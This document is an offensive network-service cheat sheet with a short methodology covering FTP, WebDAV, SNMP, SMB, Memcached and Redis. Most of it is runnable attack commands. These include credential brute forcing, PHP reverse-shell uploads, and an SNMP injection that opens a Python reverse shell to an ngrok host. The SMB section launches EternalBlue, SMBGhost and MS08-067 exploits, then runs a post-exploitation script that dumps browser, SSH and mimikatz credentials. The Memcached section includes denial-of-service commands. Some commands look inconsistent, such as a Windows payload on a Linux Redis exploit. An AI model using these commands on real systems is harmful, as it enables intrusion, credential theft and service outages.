Network Infrastructure Configuration

Check List

• Review the applications’ configurations set across the network and validate that they are not vulnerable.

• Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.

Methodology

FTP

1

Run the following command on $TARGET

2

If $TARGET has FTP protocol, do the next command to login with Anonymous

3

and using the next command to brute force the login page, will the username or password be found or not

4

and using the next command, can we login through the browser or not

5

and if we enter, enter the commands related to FTP and exploit it using Hydra and Metasploit commands

---

WebDAV

1

Run on $TARGET using the WebDAV command

2

And if it was open, the next command is used to find vulnerabilities related to WebDAV service using Metasploit

3

Using the Hydra tool, we do Burte Force on this service to get the list of usernames and passwords

4

After the Burte Force command, we check if we can upload a file using the next command If we could, we will upload the PHP file that contains RCE to the service using the command

5

And we can do the same thing using the PUT method, whether we can use this method to upload a file on this service or not

---

SNMP

1

Run $TARTGET using the command related to SNMP discover

2

If it was open, check the vulnerabilities of the service using the command of the nuclei tool

3

Using the next command, get information from the target service such as host name and OID information, list of interfaces, configured IP addresses, hardware configuration, and sometimes more sensitive information depending on the implementation

4

Using the next command, find a list of common community strings (for example, public, private, manager, ...) and extract information from them using the snmpwalk command

5

We use the snmpset command to write and change an OID on the SNMP service

6

If the service was an old version, we write a string value on the service using the command related to SNMPv1

7

If the service was an old version, use the SNMPv1 command to write a string value on the service, but if it was not using the old version, run the SNMPv2 command on the service

8

Then open a port using the Ngrok command and execute the RCE injection command on the target and you can exploit it using Metasploit

---

SMB

1

If it was open, we check service vulnerabilities using Nmap with special switches for SMB

2

The next step is to use Brute Force commands on the target protocol to identify the protocol, get the username and password list, identify the domains and groups in the service, identify active services on this protocol, and identify the running processes

3

Enter the service without a password using the commands related to the smbclient tool and find the list of subscriptions and a list of information

4

The next step is to log in using the rpcclient command with an empty username so that we can connect to RPC with an empty session to scan/count users, groups, sessions and settings. If the server allows it, it exposes user information and subscriptions

5

We can do this process and exploit using Metasploit commands

---

Memcached

1

Use the Nmap command to identify and check the existence of the protocol on the target

2

If the service on the target is active, use the Nuclei command to identify the vulnerability on the protocol

3

Using the command related to Netcat, step by step, save the protocol version, status, items, name of identification key and list of lists

4

The next step is to test the vulnerability of DOS and DDoS the service to identify the vulnerability using commands

---

Redis

1

Identify the presence of the service on the target server by using the first Redis command in the cheat sheet with the Nmap tool

2

If the service is open on the target server, use the next command to check access in unauthenticated mode

3

In the next command, we use Hydra on the Brute Force service to extract a list of password lists, and with the next command, we use the Nuclei tool to check the Misconfiguration Vulnerability to the service.

---

Cheat Sheet

FTP

Nmap

Identify FTP

nmap -p 21 -sS -sV --mtu 5000 --script banner $WEBSITE

Anonymous Login

nmap -p 21 -sS -sV --mtu 5000 --script ftp-anon $WEBSITE

Brute Force

nmap -p 21 -sS -sV --mtu 5000 --script ftp-brute $WEBSITE

Browser Login

ftp://anonymous:anonymous@$TARGET

Exploit-DB

Search Exploit

searchsploit $PRODUCT -s $VERSION -w

Nuclei

Misconfiguration & Vulnerabilities

nuclei -tags ftp -u $TARGET:21

Wget

Download Files

wget --ftp-user=anonymous --ftp-password=anonymous ftp://$TARGET:21

FTP

CLI Login

ftp

open $TARGET 21

USER

> anonymous

PASS

> anonymous

FTP Mode

passive

Download File

get file.txt

Hydra

Brute Force

hydra -V \
      -L /usr/share/seclists/Usernames/sap-default-usernames.txt \
      -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt ftp://$TARGET:21

Metasploit

Recon Version

msfconsole -qx "
    use auxiliary/scanner/ftp/ftp_version;
    set RHOSTS $WEBSITE;
    run;
    exit"

Anonymous Login

msfconsole -qx "
    use auxiliary/scanner/ftp/anonymous;
    set RHOSTS $WEBSITE;
    run;
    exit"

Brute Force

msfconsole -qx "
    use auxiliary/scanner/ftp/ftp_login;
    set RHOSTS $WEBSITE;
    set USERPASS_FILE /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt;
    run;
    exit"

WebDAV

Nmap

Identify WebDAV

nmap -p 80,443 \
     -sS -sV --mtu 5000 \
     --script http-methods,http-webdav-scan $WEBSITE

Metasploit

Scan WebDAV

msfconsole -qx "
    use auxiliary/scanner/http/webdav_scanner;
    set PATH /webdav;
    set RHOSTS $WEBSITE;
    exit"

Hydra

Brute Force

hydra -V \
      -L /usr/share/seclists/Usernames/sap-default-usernames.txt \
      -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt \
      $TARGET http-get /webdav/

DavTest

Scan WebDAV

davtest -url $WEBSITE

Upload Shell

davtest -url $WEBSITE \
        -uploadfile /usr/share/webshells/php/php-reverse-shell.php \
        -uploadloc shell.php

Listening

nc -lvnp 1234

Cadaver

cadaver $WEBSITE/webdav

PUT Web shell

put /usr/share/webshells/php/php-reverse-shell.php

Listening

nc -lvnp 1234

SNMP

Nmap

Identify SNMP

nmap -p 161 -sU -sV --mtu 5000 --script snmp-info $WEBSITE

Brute Force

nmap -p 161 -sU -sV --mtu 5000 --script snmp-brute $WEBSITE

Nuclei

Misconf & Vulns

nuclei -tags snmp -u $TARGET:161

SNMPWalk

Enumerate SNMP Public

snmpwalk -v1 -c public $TARGET

Onesixtyone

Enumerate SNMP Public

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGET

SNMPSet

SNMPv1

snmpset -v1 -c private $TARGET OID s "unk9vvn"

SNMPv2

snmpset -v2c -c private $TARGET sysName.0 s "unk9vvn"

Start Ngrok

ngrok http 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')

Inject RCE

snmpset -m +NET-SNMP-EXTEND-MIB \
        -v 2c \
        -c SuP3RPrivCom90 $TARGET 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$NGHOST\",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

Execute Command

snmpwalk -v2c -c SuP3RPrivCom90 $TARGET NET-SNMP-EXTEND-MIB::nsExtendObjects

Metasploit

Enumerate SNMP Public

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enum;
    set RHOSTS $WEBSITE;
    run;
    exit"

Enumerate SNMP Private

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enum;
    set RHOSTS $WEBSITE;
    set COMMUNITY private;
    run;
    exit"

Enumerate Windows Users

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enumusers;
    set RHOSTS $WEBSITE;
    run;
    exit"

Enumerate File Shares

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enumshares;
    set RHOSTS $WEBSITE;
    run;
    exit"

SMB

Nmap

Identify SMB

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-protocols,smb-os-discovery,smb2-capabilities $WEBSITE

Recon Vulns

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-vuln-*,smb-double-pulsar-backdoor $WEBSITE

Brute Force

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-brute $WEBSITE

Enumerate Users and Shares

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-users,smb-enum-shares $WEBSITE

Enumerate Domains and Groups

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-domains,smb-enum-groups $WEBSITE

Enumerate Services and Processes

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-services,smb-enum-processes $WEBSITE

Nuclei

SMB Misconf & Vulns

nuclei -tags smb -u $TARGET:445

netexec

Enum Host

netexec smb $TARGET

enum4linux

Enumerate Shares

enum4linux -a $TARGET

nbtscan

Enumerate Shares

nbtscan -r $TARGET/24

smbclient

User Enumeration and Null Sessions

smbclient -N -L //$TARGET

rpcclient

User Enumeration and Null Sessions

rpcclient -U "" $TARGET

Metasploit

Detect Version

msfconsole -qx "
    use auxiliary/scanner/smb/smb_version;
    set RHOSTS $TARGET;
    run;
    exit"

Enumerate Users

msfconsole -qx "
    use auxiliary/scanner/smb/smb_enumusers;
    set RHOSTS $TARGET;
    run;
    exit"

Enumerate Shares

msfconsole -qx "
    use auxiliary/scanner/smb/smb_enumshares;
    set RHOSTS $TARGET;
    run;
    exit"

Credential Dumps

msfconsole -qx "
    use auxiliary/scanner/smb/impacket/secretsdump;
    set RHOSTS $TARGET;
    run;
    exit"

Credential Brute Force

msfconsole -qx "
    use auxiliary/scanner/smb/smb_login;
    set RHOSTS $TARGET;
    set SMBUser Administrator;
    set PASS_FILE /usr/share/seclists/Passwords/Default-Credentials/default-passwords.txt;
    set STOP_ON_SUCCESS true;
    set ANONYMOUS_LOGIN true;
    set THREADS 10;
    run;
    exit"

Detect EternalBlue

msfconsole -qx "
    use auxiliary/scanner/smb/smb_ms17_010;
    set RHOSTS $TARGET;
    run;
    exit"

Start Ngrok

ngrok http 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
    use auxiliary/gather/impersonate_ssl;
    set RHOSTS google.com;
    run;
    exit"

Define ENV Cert

CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

EternalBlue Exploit (ٌWin 7 to 10 - Win Server 2008 to 2012)

msfconsole -qx "
    use exploit/windows/smb/ms17_010_eternalblue;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Doublepulsar Exploit (ٌWin 7 to 10 - Win Server 2008 to 2012)

msfconsole -qx "
    use exploit/windows/smb/smb_doublepulsar_rce;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

SMBGhost Exploit (Win 10)

msfconsole -qx "
    use exploit/windows/smb/cve_2020_0796_smbghost;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Net API Exploit (Win XP's)

msfconsole -qx "
    use exploit/windows/smb/ms08_067_netapi;
    set PAYLOAD windows/meterpreter/reverse_hop_http;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Memcached

Nmap

Identify Memcached

nmap -p 11211 -sS -sV --mtu 5000 --script memcached-info $WEBSITE

Nuclei

Memcached Misconf

nuclei -tags memcached -u $TARGET:11211

Netcat

Get Version

echo "version" | nc -vn -w 1 $TARGET 11211

Get Status

echo "stats" | nc -vn -w 1 $TARGET 11211

Get Slabs

echo "stats slabs" | nc -vn -w 1 $TARGET 11211

Get Items

echo "stats items" | nc -vn -w 1 $TARGET 11211

Get Key Names

echo "stats cachedump 1 10" | nc -vn -w 1 $TARGET 11211

Get Info Saved

echo "get $ITEM" | nc -vn -w 1 $TARGET 11211

Denial of Service

for i in {1..10000}; do echo "set key$i 0 0 1024" | nc $TARGET 11211; done

DDoS Amplification

echo -e "\x00\x00\x00\x00\x00\x01\x00\x00stats\n" | nc -u -q 1 $TARGET 11211

libmemcached-tools

Get Stats

memcstat --servers=$TARGET

Get all items

memcdump --servers=$TARGET

Get info inside the item(s)

memccat --servers=$TARGET $ITEM1 $ITEM2 $ITEM3

Metasploit

Extract Slabs

msfconsole -qx "use auxiliary/gather/memcached_extractor;set RHOSTS $TARGET;run;exit"

Denial of Service

msfconsole -qx "use auxiliary/dos/misc/memcached;set RHOSTS $TARGET;run;exit"

Redis

Nmap

Identify Redis

nmap -p 6379 -sS -sV --mtu 5000 --script redis-info $TARGET

redis-cli

Unauthorized Access

redis-cli -h $TARGET -p 6379

Hydra

Brute Force Creds

hydra -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt \
      -s 6379 $TARGET redis

Nuclei

Scan Misconf with Nuclei

nuclei -tags redis -u $TARGET:6379

Metasploit-Framework

Scan with Metasploit

msfconsole -qx "use auxiliary/scanner/redis/redis_server;
    set RHOSTS $TARGET;
    run;
    exit"

Misconfiguration Check

msfconsole -qx "use auxiliary/gather/redis_extractor;
    set RHOSTS $TARGET;
    run;
    exit"

Brute Force

msfconsole -qx "
    use auxiliary/scanner/redis/redis_login;
    set RHOSTS $TARGET;
    set ANONYMOUS_LOGIN true;
    set STOP_ON_SUCCESS true;
    set THREADS 10;
    run -j"

Exploitation

Remote Code Execution

msfconsole -qx "
    use exploit/linux/redis/redis_replication_cmd_exec;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"